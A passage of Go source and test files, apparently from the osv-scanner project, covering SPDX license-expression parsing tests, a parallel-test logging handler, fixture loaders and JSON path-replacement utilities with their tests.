"LGPL-2.1-only OR MIT OR BSD-3-Clause", pass: [][]string{ {"LGPL-2.1-only"}, {"MIT"}, {"BSD-3-Clause"}, {"Apache-2.0", "MIT"}, {"LGPL-2.1-only", "MIT", "BSD-3-Clause"}, {"LGPL-2.1-only", "BSD-3-Clause"}, }, fail: [][]string{ {"Apache-2.0"}, }, }, // AND expressions { license: "MIT AND Apache-2.0", pass: [][]string{ {"Apache-2.0", "MIT"}, {"Apache-2.0", "Apache-1.0", "MIT"}, }, fail: [][]string{ {"MIT"}, {"Apache-2.0"}, {"Apache-1.0"}, {"Apache-1.0", "MIT"}, }, }, // AND & OR expressions { license: "LGPL-2.1-only OR BSD-3-Clause AND MIT", pass: [][]string{ {"LGPL-2.1-only"}, {"BSD-3-Clause", "MIT"}, {"LGPL-2.1-only", "BSD-3-Clause", "MIT"}, {"LGPL-2.1-only", "BSD-3-Clause"}, {"LGPL-2.1-only", "MIT"}, }, fail: [][]string{ {"Apache-2.0"}, {"BSD-3-Clause"}, {"MIT"}, }, }, { license: "MIT AND LGPL-2.1-only OR BSD-3-Clause", pass: [][]string{ {"BSD-3-Clause"}, {"BSD-3-Clause", "MIT"}, {"LGPL-2.1-only", "BSD-3-Clause", "MIT"}, {"LGPL-2.1-only", "BSD-3-Clause"}, {"LGPL-2.1-only", "MIT"}, {"MIT", "LGPL-2.1-only"}, }, fail: [][]string{ {"Apache-2.0"}, {"LGPL-2.1-only"}, {"MIT"}, }, }, { license: "A OR B AND C OR D", pass: [][]string{ {"A"}, {"B", "C"}, {"D"}, {"A", "B", "C"}, {"B", "C", "D"}, {"A", "D"}, {"A", "B", "C", "D"}, }, fail: [][]string{ {"B"}, {"C"}, {"E"}, }, }, { license: "MIT AND LGPL-2.1-or-later OR BSD-3-Clause", pass: [][]string{ {"BSD-3-Clause"}, {"MIT", "LGPL-2.1-or-later"}, {"MIT", "BSD-3-Clause"}, {"LGPL-2.1-or-later", "BSD-3-Clause"}, {"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"}, }, fail: [][]string{ {"Apache-2.0"}, {"MIT"}, {"LGPL-2.1-or-later"}, }, }, { license: "BSD-3-Clause OR MIT AND LGPL-2.1-or-later", pass: [][]string{ {"BSD-3-Clause"}, {"MIT", "LGPL-2.1-or-later"}, {"MIT", "BSD-3-Clause"}, {"LGPL-2.1-or-later", "BSD-3-Clause"}, {"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"}, }, fail: [][]string{ {"Apache-2.0"}, {"MIT"}, {"LGPL-2.1-or-later"}, }, }, // parentheses { license: "MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)", pass: [][]string{ {"MIT", "LGPL-2.1-or-later"}, {"MIT", "BSD-3-Clause"}, {"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"}, }, fail: [][]string{ {"Apache-2.0"}, {"MIT"}, {"LGPL-2.1-or-later"}, {"BSD-3-Clause"}, {"LGPL-2.1-or-later", "BSD-3-Clause"}, }, }, { license: "(BSD-3-Clause OR LGPL-2.1-or-later) AND MIT", pass: [][]string{ {"MIT", "LGPL-2.1-or-later"}, {"MIT", "BSD-3-Clause"}, {"MIT", "LGPL-2.1-or-later", "BSD-3-Clause"}, }, fail: [][]string{ {"Apache-2.0"}, {"MIT"}, {"LGPL-2.1-or-later"}, {"BSD-3-Clause"}, {"LGPL-2.1-or-later", "BSD-3-Clause"}, }, }, { license: "(A OR B) AND (C OR D)", pass: [][]string{ {"A", "C"}, {"A", "D"}, {"B", "C"}, {"B", "D"}, {"A", "C", "D"}, {"B", "C", "D"}, {"A", "B", "C"}, {"A", "B", "D"}, {"A", "B", "C", "D"}, }, fail: [][]string{ {"A"}, {"B"}, {"C"}, {"D"}, {"A", "B"}, {"C", "D"}, {"E"}, }, }, { license: "A AND (B OR C AND D)", pass: [][]string{ {"A", "B"}, {"A", "C", "D"}, {"A", "B", "C", "D"}, }, fail: [][]string{ {"A"}, {"B"}, {"C"}, {"D"}, {"A", "C"}, {"A", "D"}, {"C", "D"}, {"B", "C", "D"}, {"E"}, }, }, { license: "A AND ((B OR C) AND D)", pass: [][]string{ {"A", "B", "D"}, {"A", "C", "D"}, {"A", "B", "C", "D"}, }, fail: [][]string{ {"A"}, {"B"}, {"C"}, {"D"}, {"A", "B"}, {"A", "C"}, {"A", "D"}, {"C", "D"}, {"B", "C", "D"}, {"E"}, }, }, { license: "A AND B AND C OR D AND E OR F", pass: [][]string{ {"A", "B", "C", "D", "E", "F"}, {"A", "B", "C", "D", "E"}, {"A", "B", "C"}, {"D", "E"}, {"F"}, }, fail: [][]string{ {"A"}, {"B"}, {"C"}, {"D"}, {"E"}, {"A", "C"}, {"A", "D"}, {"A", "E"}, {"B", "C"}, {"B", "D"}, {"B", "E"}, {"C", "C"}, {"C", "D"}, {"C", "E"}, }, }, } for _, tt := range tests { for _, variant := range tt.pass { t.Run(namer(t, tt.license, variant, true), func(t *testing.T) { t.Parallel() got, err := spdx.Satisfies(tt.license, variant) if err != nil { t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, err, nil) } if !got { t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, got, true) } }) } for _, variant := range tt.fail { t.Run(namer(t, tt.license, variant, false), func(t *testing.T) { t.Parallel() got, err := spdx.Satisfies(tt.license, variant) if err != nil { t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, err, nil) } if got { t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, got, false) } }) } } } func TestSatisfies_Invalid(t *testing.T) { t.Parallel() tests := []struct { license models.License wantErr string }{ // brackets must be paired {"(A AND B", "missing closing bracket"}, {"(((A AND B))", "missing closing bracket"}, {"(A AND B OR (A AND C)", "missing closing bracket"}, // "WITH" must only be followed by a license expression {"A WITH(", "unexpected ( after WITH"}, {"A WITH (", "unexpected ( after WITH"}, {"A WITH WITH", "unexpected WITH after WITH"}, //nolint:dupword {"A WITH AND", "unexpected AND after WITH"}, {"A WITH OR", "unexpected OR after WITH"}, {"A WITH)", "unexpected ) after WITH"}, {"A WITH )", "unexpected ) after WITH"}, {"A WITH", "unexpected END after WITH"}, {"A WITH ", "unexpected END after WITH"}, // "AND" must only be followed by a license expression or "(" {"A AND WITH", "unexpected WITH after AND"}, {"A AND AND", "unexpected AND after AND"}, //nolint:dupword {"A AND OR", "unexpected OR after AND"}, {"A AND )", "unexpected ) after AND"}, {"A AND)", "unexpected ) after AND"}, {"A AND", "unexpected END after AND"}, {"A AND ", "unexpected END after AND"}, // "OR" must only be followed by a license expression or "(" {"A OR WITH", "unexpected WITH after OR"}, {"A OR AND", "unexpected AND after OR"}, {"A OR OR", "unexpected OR after OR"}, //nolint:dupword {"A OR )", "unexpected ) after OR"}, {"A OR)", "unexpected ) after OR"}, {"A OR", "unexpected END after OR"}, {"A OR ", "unexpected END after OR"}, // "(" must only be followed by a license expression or "(" {"(WITH", "unexpected WITH after ("}, {"( WITH", "unexpected WITH after ("}, {"(AND", "unexpected AND after ("}, {"( AND", "unexpected AND after ("}, {"(OR", "unexpected OR after ("}, {"( OR", "unexpected OR after ("}, {"()", "unexpected ) after ("}, {"( )", "unexpected ) after ("}, {"(", "unexpected END after ("}, {"( ", "unexpected END after ("}, // ")" must only be followed by a license expression, ")", "WITH", "AND", or "OR" {"(A)(", "unexpected ( after )"}, {"(A) (", "unexpected ( after )"}, {"( A ) (", "unexpected ( after )"}, {"(A)Apache-2.0", "unexpected EXP after )"}, {"(A)MIT", "unexpected EXP after )"}, {"(A) MIT", "unexpected EXP after )"}, {"( A ) MIT", "unexpected EXP after )"}, {"(A)WITH", "unexpected WITH after )"}, {"(A) WITH", "unexpected WITH after )"}, {"( A ) WITH", "unexpected WITH after )"}, // a license expression must only be followed by "WITH", "AND", "OR", or nothing {"MIT (", "unexpected ( after EXP"}, {"MIT(", "unexpected ( after EXP"}, {"Apache2.0(", "unexpected ( after EXP"}, {"MIT Apache2.0", "unexpected EXP after EXP"}, // nested errors {"A AND (OR", "unexpected OR after ("}, {"A OR (AND", "unexpected AND after ("}, {"A OR AND (()", "unexpected AND after OR"}, {"A OR (()", "unexpected ) after ("}, {"A OR (B AND A OR (OR)", "unexpected OR after ("}, } for _, tt := range tests { t.Run(string(tt.license), func(t *testing.T) { t.Parallel() got, err := spdx.Satisfies(tt.license, []string{}) if got { t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, got, false) } if err == nil { t.Fatalf("Satisfies(\"%s\") = %v, want %v", tt.license, err, tt.wantErr) } if !strings.Contains(err.Error(), tt.wantErr) { t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, err, tt.wantErr) } }) } } ================================================ FILE: internal/spdx/verify.go ================================================ package spdx import "strings" // Unrecognized filters licenses for non-spdx identifiers. The "unknown" string is // also treated as a valid identifier. func Unrecognized(licenses []string) (unrecognized []string) { for _, license := range licenses { l := strings.ToLower(license) if !IDs[l] && l != "unknown" { unrecognized = append(unrecognized, license) } } return unrecognized } ================================================ FILE: internal/spdx/verify_test.go ================================================ package spdx_test import ( "reflect" "testing" "github.com/google/osv-scanner/v2/internal/spdx" ) func TestUnrecognized(t *testing.T) { t.Parallel() tests := []struct { name string licenses []string want []string }{ { name: "all_recognized_licenses", licenses: []string{"agpl-1.0", "MIT", "apache-1.0", "UNKNOWN"}, want: nil, }, { name: "all_unrecognized_licenses", licenses: []string{"agpl1.0", "unrecognized license", "apache1.0"}, want: []string{"agpl1.0", "unrecognized license", "apache1.0"}, }, { name: "some_recognized,_some_unrecognized_licenses", licenses: []string{"agpl-1.0", "unrecognized license", "apache-1.0"}, want: []string{"unrecognized license"}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := spdx.Unrecognized(tt.licenses); !reflect.DeepEqual(got, tt.want) { t.Errorf("Unrecognized() = %v,\nwant %v", got, tt.want) } }) } } ================================================ FILE: internal/testlogger/handler.go ================================================ // Package testlogger provides a slog handler which can handle t.Parallel() tests while being a global logging handler, // redirecting it to the correct underlying logger for each test thread. // // This package also muffles certain log messages to reduce noise in the snapshots // and to keep the snapshots consistent across runs. package testlogger import ( "bufio" "bytes" "context" "log/slog" "os" "runtime/debug" "strings" "sync" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) var stdLogger = cmdlogger.New(os.Stdin, os.Stdout) // Handler can be set as the global logging handler before the test starts, and individual test cases can add their // own instance/implementation of the cmdlogger.CmdLogger interface. type Handler struct { loggerMap sync.Map // map[string]cmdlogger.CmdLogger } func (tl *Handler) getLogger() cmdlogger.CmdLogger { key := getCallerInstance() if key == "" { return stdLogger } val, ok := tl.loggerMap.Load(key) if !ok { panic("logger not found: " + key) } return val.(cmdlogger.CmdLogger) } // AddInstance adds a "global" logger to this specific test run. func (tl *Handler) AddInstance(logger cmdlogger.CmdLogger) { key := getCallerInstance() prev, _ := tl.loggerMap.Swap(key, logger) if prev != nil { // This is used as a safety check for incorrect usage of the Handler, and should never happen // during actual tests if Delete() is correctly called at the end of a test. panic("same logger being added twice") } } // Delete removes the logger created by AddInstance() // This **must** be called before a test ends, as the same memory address may be reused. func (tl *Handler) Delete() { tl.loggerMap.Delete(getCallerInstance()) } // SendEverythingToStderr tells the logger to send all logs to stderr regardless // of their level. // // This is useful if we're expecting to output structured data to stdout such // as JSON, which cannot be mixed with other output. func (tl *Handler) SendEverythingToStderr() { tl.getLogger().SendEverythingToStderr() } func (tl *Handler) SetLevel(level slog.Leveler) { tl.getLogger().SetLevel(level) } func (tl *Handler) Enabled(ctx context.Context, level slog.Level) bool { return tl.getLogger().Enabled(ctx, level) } func (tl *Handler) Handle(ctx context.Context, record slog.Record) error { for _, prefix := range []string{ "Starting filesystem walk for root:", "End status: ", "Neither CPE nor PURL found for package", "Invalid PURL", "os-release[ID] not set, fallback to", // TODO(another-rex): We should allow overriding of these values to avoid this issue. "VERSION_ID not set in os-release", "VERSION_CODENAME and VERSION_ID not set in os-release", "VERSION_CODENAME not set in os-release, fallback to VERSION_ID", "osrelease.ParseOsRelease(): file does not exist", "Status: new inodes:", "Created image content file:", "interpreting as regex/glob and not absolute path", } { if strings.HasPrefix(record.Message, prefix) { return nil } } l := tl.getLogger() if l == stdLogger { // This is to be safe as we currently do not have any non muffled goroutine logs // When we do, this makes sure that we are aware and can add exceptions to them. panic("noop logger found when logging non-muffled messages") } return l.Handle(ctx, record) } func (tl *Handler) SetHasErrored() { tl.getLogger().SetHasErrored() } // HasErrored returns true if there have been any calls to Handle with // a level of [slog.LevelError] func (tl *Handler) HasErrored() bool { return tl.getLogger().HasErrored() } // HasErroredBecauseInvalidConfig returns true if there have been any calls to // Handle with a level of [slog.LevelError] due to a config file being invalid func (tl *Handler) HasErroredBecauseInvalidConfig() bool { return tl.getLogger().HasErroredBecauseInvalidConfig() } func (tl *Handler) WithAttrs(attrs []slog.Attr) slog.Handler { return tl.getLogger().WithAttrs(attrs) } func (tl *Handler) WithGroup(g string) slog.Handler { return tl.getLogger().WithGroup(g) } var _ cmdlogger.CmdLogger = &Handler{} func New() *Handler { return &Handler{ loggerMap: sync.Map{}, } } // getCallerInstance finds in the call stack the memory address of the initial test runner call. // It will look something like this: // // `testing.tRunner(0x12345678, 0x98765432)` // // This is safe to be used as a key, as the first pointer address must be unique // while this test is running, and will only be reused after the test exists and that address is garbage collected. // // This uses debug.Stack(), which will create a buffer big enough to fit the entire stack trace. // If there is deep recursion, this will have a significant performance cost. // // Caveat: This cannot get the stack trace if called from a goroutine, and will return "" func getCallerInstance() string { stack := debug.Stack() sc := bufio.NewScanner(bytes.NewReader(stack)) for sc.Scan() { if strings.HasPrefix(sc.Text(), "testing.tRunner(") { return sc.Text() } if strings.HasPrefix(sc.Text(), "created by ") && strings.Contains(sc.Text(), " in goroutine ") { return "" } } return "" } ================================================ FILE: internal/testlogger/markers.go ================================================ package testlogger import ( "testing" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) const BeginDirectoryScan = "---Begin Directory Scan---" const EndDirectoryScan = "---End Directory Scan---" // BeginDirScanMarker prints out a directory scanning marker during testing to allow snapshots to sort // the scanning order to allow for unsorted file walks. func BeginDirScanMarker() { if testing.Testing() { cmdlogger.Infof(BeginDirectoryScan) } } // EndDirScanMarker prints out a directory scanning marker during testing to mark the end of directory walks func EndDirScanMarker() { if testing.Testing() { cmdlogger.Infof(EndDirectoryScan) } } ================================================ FILE: internal/testutility/fixture.go ================================================ // Package testutility provides utility functions for tests. package testutility import ( "encoding/json" "os" "testing" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) // load returns the contents of the fixture file after applying any replacements if on Windows func load(t *testing.T, path string, windowsReplacements map[string]string) []byte { t.Helper() var file []byte var err error file, err = os.ReadFile(path) if err != nil { t.Fatalf("Failed to open fixture: %s", err) } return []byte(applyWindowsReplacements(string(file), windowsReplacements)) } // LoadJSONFixture returns the contents of the fixture file parsed as JSON func LoadJSONFixture[V any](t *testing.T, path string) V { t.Helper() return LoadJSONFixtureWithWindowsReplacements[V](t, path, map[string]string{}) } // LoadJSONFixtureWithWindowsReplacements returns the contents of the fixture // file parsed as JSON after applying any replacements if running on Windows func LoadJSONFixtureWithWindowsReplacements[V any]( t *testing.T, path string, replacements map[string]string, ) V { t.Helper() file := load(t, path, replacements) var elem V err := json.Unmarshal(file, &elem) if err != nil { t.Fatalf("Failed to unmarshal val: %s", err) } return elem } // LoadVulnMapFixture returns the contents of the fixture file parsed as a map of vulnerability IDs to vulnerabilities func LoadVulnMapFixture(t *testing.T, path string) map[string]*osvschema.Vulnerability { t.Helper() file := load(t, path, map[string]string{}) var raw map[string]json.RawMessage err := json.Unmarshal(file, &raw) if err != nil { t.Fatalf("Failed to unmarshal val: %s", err) } vulns := make(map[string]*osvschema.Vulnerability) for id, rawVuln := range raw { vuln := &osvschema.Vulnerability{} if err := protojson.Unmarshal(rawVuln, vuln); err != nil { t.Fatalf("Failed to unmarshal vuln %s: %s", id, err) } vulns[id] = vuln } return vulns } ================================================ FILE: internal/testutility/jsonreplace.go ================================================ package testutility import ( "strconv" "strings" "testing" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/tidwall/gjson" "github.com/tidwall/sjson" ) type JSONReplaceRule struct { Path string ReplaceFunc func(toReplace gjson.Result) any } var ( // OnlyIDVulnsRule simplifies vulnerabilities to only their ID OnlyIDVulnsRule = JSONReplaceRule{ Path: "results.#.packages.#.vulnerabilities", ReplaceFunc: func(toReplace gjson.Result) any { return toReplace.Get("#.id").Value() }, } // GroupsAsArrayLen replaces the groups array with its length GroupsAsArrayLen = JSONReplaceRule{ Path: "results.#.packages.#.groups", ReplaceFunc: func(toReplace gjson.Result) any { if toReplace.IsArray() { return len(toReplace.Array()) } return 0 }, } // OnlyFirstBaseImage simplifies the array of base images to only the first one OnlyFirstBaseImage = JSONReplaceRule{ Path: "image_metadata.base_images.#", ReplaceFunc: func(toReplace gjson.Result) any { if toReplace.IsArray() && len(toReplace.Array()) >= 1 { return toReplace.Array()[0].Value() } return struct{}{} }, } // AnyDiffID truncates diff ids in image layer metadata to just `sha256:...` AnyDiffID = JSONReplaceRule{ Path: "image_metadata.layer_metadata.#.diff_id", ReplaceFunc: func(toReplace gjson.Result) any { if len(toReplace.String()) > 7 { return toReplace.String()[:7] + "..." } return "" }, } // ShortenHistoryCommandLength truncates COMMAND data to 28 characters ShortenHistoryCommandLength = JSONReplaceRule{ Path: "image_metadata.layer_metadata.#.command", ReplaceFunc: func(toReplace gjson.Result) any { if len(toReplace.String()) > 28 { return toReplace.String()[:25] + "..." } return toReplace.String() }, } // NormalizeHistoryCommand replaces COMMAND data to be consistent // across different versions of docker NormalizeHistoryCommand = JSONReplaceRule{ Path: "image_metadata.layer_metadata.#.command", ReplaceFunc: func(toReplace gjson.Result) any { str := toReplace.String() nopMatcher := cachedregexp.MustCompile(`^/bin/sh -c #\(nop\)\s+`) runMatcher := cachedregexp.MustCompile(`^/bin/sh -c\s+`) str = nopMatcher.ReplaceAllLiteralString(str, "") str = runMatcher.ReplaceAllString(str, "RUN \\0") return str }, } // NormalizeCreateDateSPDX replaces the created date with a placeholder date NormalizeCreateDateSPDX = JSONReplaceRule{ Path: "creationInfo.created", ReplaceFunc: func(_ gjson.Result) any { return "2025-01-01T01:01:01Z" }, } ReplacePartialFingerprintHash = JSONReplaceRule{ Path: "runs.#.results.#.partialFingerprints.primaryLocationLineHash", ReplaceFunc: func(toReplace gjson.Result) any { if len(toReplace.String()) > 0 { return "[line-hash]" } return "[empty]" }, } ) func expandArrayPaths(t *testing.T, jsonInput string, path string) []string { t.Helper() // split on the first intermediate #, if present pathToArray, restOfPath, hasArrayPlaceholder := strings.Cut(path, ".#.") // if there is no intermediate placeholder, check for (and cut) a terminal one if !hasArrayPlaceholder { pathToArray, hasArrayPlaceholder = strings.CutSuffix(path, ".#") } // if there are no array placeholders in the path, just return it if !hasArrayPlaceholder { return []string{path} } r := gjson.Get(jsonInput, pathToArray) // skip properties that are not arrays if !r.IsArray() { return []string{} } // if property exists and is actually an array, build out the path to each item // within that array paths := make([]string, 0, len(r.Array())) for i := range r.Array() { static := pathToArray + "." + strconv.Itoa(i) if restOfPath != "" { static += "." + restOfPath } paths = append(paths, expandArrayPaths(t, jsonInput, static)...) } return paths } // ReplaceJSONInput takes a gjson path and replaces all elements the path matches with the output of matcher func ReplaceJSONInput(t *testing.T, jsonInput string, path string, replacer func(toReplace gjson.Result) any) string { t.Helper() var err error json := jsonInput for _, pathElem := range expandArrayPaths(t, jsonInput, path) { res := gjson.Get(jsonInput, pathElem) if !res.Exists() { continue } // optimistically replace the element, since we know at this point it does exist json, err = sjson.SetOptions(json, pathElem, replacer(res), &sjson.Options{Optimistic: true}) if err != nil { t.Fatalf("failed to set element") } } return json } ================================================ FILE: internal/testutility/jsonreplace_test.go ================================================ package testutility import ( "bytes" "encoding/json" "fmt" "maps" "slices" "testing" "github.com/google/go-cmp/cmp" "github.com/tidwall/gjson" ) func Test_replaceJSONInput(t *testing.T) { t.Parallel() matcher := func(_ gjson.Result) any { return "" } tests := []struct { input string outputs map[string]string }{ { input: `{}`, outputs: map[string]string{"": `{}`, "arr.#": `{}`}, }, { input: `{ "foo": "bar" }`, outputs: map[string]string{ "does.not.exist": `{ "foo": "bar" }`, "foo.is.string": `{ "foo": "bar" }`, "foo.#": `{ "foo": "bar" }`, "#": `{ "foo": "bar" }`, "foo": `{ "foo": "" }`, }, }, { input: `{ "foo": { "inner": "bar" } }`, outputs: map[string]string{ "foo.inner": `{ "foo": { "inner": "" } }`, }, }, { input: `{ "arr": [1, 2, 3] }`, outputs: map[string]string{ "arr": `{ "arr": "" }`, "arr.1": `{ "arr": [1, "", 3] }`, "arr.#": `{ "arr": ["", "", ""] }`, "arr.#(>2)": `{ "arr": [1, 2, ""] }`, "arr.#(>1)": `{ "arr": [1, "", 3] }`, "arr.#(>1)#": `{ "arr": [1, "", ""] }`, }, }, { input: `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, outputs: map[string]string{ "arr": `{ "arr": "" }`, "arr.0.v": `{ "arr": [{"v": ""}, {"v": 2}, {"v": 3}] }`, "arr.1.v": `{ "arr": [{"v": 1}, {"v": ""}, {"v": 3}] }`, "arr.#": `{ "arr": ["", "", ""] }`, "arr.#.v": `{ "arr": [{"v": ""}, {"v": ""}, {"v": ""}] }`, "arr.#.v.#": `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, "arr.#.#.#": `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, "arr.#.#": `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, outputs: map[string]string{ "arr": `{ "arr": "" }`, "arr.0.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.1.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": ""}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.1.v.2.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.#": `{ "arr": [ "", "", "" ] }`, "arr.1.v.#": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": ["", ""] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.#.v.#": `{ "arr": [ { "v": ["", ""] }, { "v": ["", ""] }, { "v": ["", ""] } ] }`, "arr.#.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, { "v": [{"v": ""}, {"v": 4}] }, { "v": [{"v": ""}, {"v": 6}] } ] }`, "arr.#.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": ""}] }, { "v": [{"v": 3}, {"v": ""}] }, { "v": [{"v": 5}, {"v": ""}] } ] }`, "arr.#.v.#.v": `{ "arr": [ { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] } ] }`, "arr.1.v.#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] }, { "v": [{"v": 7}] } ] }`, outputs: map[string]string{ "arr.#.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, { "v": [{"v": ""}, {"v": 4}] }, { "v": [{"v": ""}, {"v": 6}] }, { "v": [{"v": ""}] } ] }`, "arr.#.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": ""}] }, { "v": [{"v": 3}, {"v": ""}] }, { "v": [{"v": 5}, {"v": ""}] }, { "v": [{"v": 7}] } ] }`, "arr.#.v.#.v": `{ "arr": [ { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}] } ] }`, "arr.1.v.#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": 5}, {"v": 6}] }, { "v": [{"v": 7}] } ] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": 5}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, outputs: map[string]string{ "arr.#.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, {}, { "v": [{"v": ""}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, "arr.#.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": ""}] }, {}, { "v": [{"v": 5}, {"v": ""}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, "arr.#.v.#.v": `{ "arr": [ { "v": [{"v": ""}, {"v": ""}] }, {}, { "v": [{"v": ""}, {"v": ""}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, "arr.1.v.#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": 5}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, "arr.#": `{ "arr": [ "", "", "", "", "", "", "" ] }`, "arr.#.v": `{ "arr": [ { "v": "" }, {}, { "v": "" }, { "foo": "bar" }, { "v": "" }, { "v": "" }, { "v": "" } ] }`, "arr.#.v.#": `{ "arr": [ { "v": ["", ""] }, {}, { "v": ["", ""] }, { "foo": "bar" }, { "v": [] }, { "v": [""] }, { "v": [""] } ] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": 5}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, outputs: map[string]string{ "arr.#.v.#(v>=3).v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": ""}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, "arr.#.v.#(v>=3)#": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": ["", ""] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [""] } ] }`, "arr.#.v.#(v>=3)#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": ""}, {"v": ""}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, }, }, { input: `{ "results": [ {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2024-02-16T08:21:35.601880Z" } ] }, {}, {}, {} ] }`, outputs: map[string]string{ "results.#.vulns.#.modified": `{ "results": [ {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "" } ] }, {}, {}, {} ] }`, }, }, } for i, tt := range tests { paths := slices.AppendSeq(make([]string, 0, len(tt.outputs)), maps.Keys(tt.outputs)) slices.Sort(paths) for _, path := range paths { t.Run(fmt.Sprintf("%d-%s", i, path), func(t *testing.T) { t.Parallel() got := ReplaceJSONInput(t, tt.input, path, matcher) if !gjson.Valid(got) { t.Fatalf("Output not valid: \n%s", got) } if !gjson.Valid(tt.outputs[path]) { t.Fatalf("Want field is not valid JSON: \n%s", tt.outputs[path]) } var wantPretty bytes.Buffer var gotPretty bytes.Buffer _ = json.Indent(&wantPretty, []byte(tt.outputs[path]), "", " ") _ = json.Indent(&gotPretty, []byte(got), "", " ") if diff := cmp.Diff(wantPretty.String(), gotPretty.String()); diff != "" { t.Errorf("ReplaceJSONInput() diff (-want +got): %s", diff) } }) } } } func Test_replaceJSONInput_More(t *testing.T) { t.Parallel() // A nested JSON structure with arrays nestedArray := `{ "items": [ { "subStruct": { "subitems": [ { "anotherSubStruct": "original value 1" }, { "anotherSubStruct": "original value 2" } ] } }, { "subStruct": { "subitems": [ { "anotherSubStruct": "original value 3" }, { "anotherSubStruct": "original value 4" } ] } } ] }` // A simple JSON structure simpleStruct := `{ "test": { "field": "original value" } }` type args struct { jsonInput string path string matcher func(toReplace gjson.Result) any } tests := []struct { name string args args want string }{ { name: "Nested_json_replacement", args: args{ jsonInput: nestedArray, path: "items.#.subStruct.subitems.#.anotherSubStruct", matcher: func(_ gjson.Result) any { return "" }, }, want: `{ "items": [ { "subStruct": { "subitems": [ { "anotherSubStruct": "" }, { "anotherSubStruct": "" } ] } }, { "subStruct": { "subitems": [ { "anotherSubStruct": "" }, { "anotherSubStruct": "" } ] } } ] }`, }, { name: "simple_json_replacement", args: args{ jsonInput: simpleStruct, path: "test.field", matcher: func(_ gjson.Result) any { return "" }, }, want: `{ "test": { "field": "" } }`, }, { name: "nested_json_array_element_replacement", args: args{ jsonInput: nestedArray, path: "items.#.subStruct.subitems.#", matcher: func(res gjson.Result) any { return res.Get("anotherSubStruct").Value() }, }, want: `{ "items": [ { "subStruct": { "subitems": [ "original value 1", "original value 2" ] } }, { 